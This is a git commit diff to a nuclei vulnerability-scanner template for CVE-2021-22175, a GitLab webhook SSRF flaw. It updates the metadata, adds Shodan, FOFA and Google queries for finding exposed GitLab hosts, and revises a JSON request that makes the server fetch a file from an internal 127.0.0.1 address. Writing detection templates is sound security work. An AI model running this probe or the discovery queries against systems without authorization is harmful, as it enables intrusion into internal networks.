updated matcher

projectdiscovery · Nov 12, 2024 · 9227e81 · 9227e81
1 parent 908e1d2
commit 9227e81
Showing 1 changed file with 21 additions and 5 deletions.
diff --git a/http/cves/2021/CVE-2021-22175.yaml b/http/cves/2021/CVE-2021-22175.yaml
@@ -4,7 +4,8 @@ info:
   name: GitLab Webhooks Server-Side Request Forgery Vulnerability
   author: CodeStuffBreakThings
   severity: critical
-  description: GitLab CE/EE versions 10.5.0 to 13.6.6, 13.7.0 to 13.7.6, and 13.8.0 to 13.8.3 contain a server-side request forgery (SSRF) vulnerability that could be exploited by an unauthenticated attacker to send requests to the internal network. This vulnerability occurs in the webhook functionality of GitLab, even on instances where user registration is disabled, allowing potential unauthorized access to internal services.
+  description: |
+    GitLab CE/EE versions 10.5.0 to 13.6.6, 13.7.0 to 13.7.6, and 13.8.0 to 13.8.3 contain a server-side request forgery (SSRF) vulnerability that could be exploited by an unauthenticated attacker to send requests to the internal network. This vulnerability occurs in the webhook functionality of GitLab, even on instances where user registration is disabled, allowing potential unauthorized access to internal services.
   remediation: Upgrade GitLab to a newer version. This vulnerability is patched in 13.6.7, 13.7.7, and 13.8.4. Alternatively, disable the "Allow requests to the local network from webhooks and integrations" setting.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
@@ -18,12 +19,26 @@ info:
     cwe-id: CWE-918
     epss-score: 0.00845
     epss-percentile: 0.82644
-    cpe: cpe:2.3:a:gitlab:gitlab:::::*:::*
+    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
   metadata:
+    verified: true
+    max-request: 1
+    vendor: gitlab
+    product: gitlab
     shodan-query:
-      - title:"GitLab"
+      - http.title:"gitlab"
       - cpe:"cpe:2.3:a:gitlab:gitlab"
-  tags: cve2021,cve,gitlab,ssrf
+      - http.html:"gitlab enterprise edition"
+      - http.html:"gitlab-ci.yml"
+    fofa-query:
+      - body="gitlab enterprise edition"
+      - body="gitlab-ci.yml"
+      - title="gitlab"
+    google-query: intitle:"gitlab"
+  tags: cve,cve2021,cve,gitlab,ssrf
+
+variables:
+  rand: "{{to_lower(rand_text_alpha(8))}}"
 
 http:
   - raw:
@@ -32,11 +47,12 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        { "include_merged_yaml": true, "content": "include:\n  remote: 'http://127.0.0.1:9100/notarealfilenuclei.yml'" }
+        { "include_merged_yaml": true, "content": "include:\n  remote: 'http://127.0.0.1:9100/{{rand}}.yml'" }
 
     matchers:
       - type: dsl
         dsl:
           - 'status_code == 200'
           - 'contains(body, "does not have valid YAML syntax")'
+          - 'contains(content_type, "application/json")'
         condition: and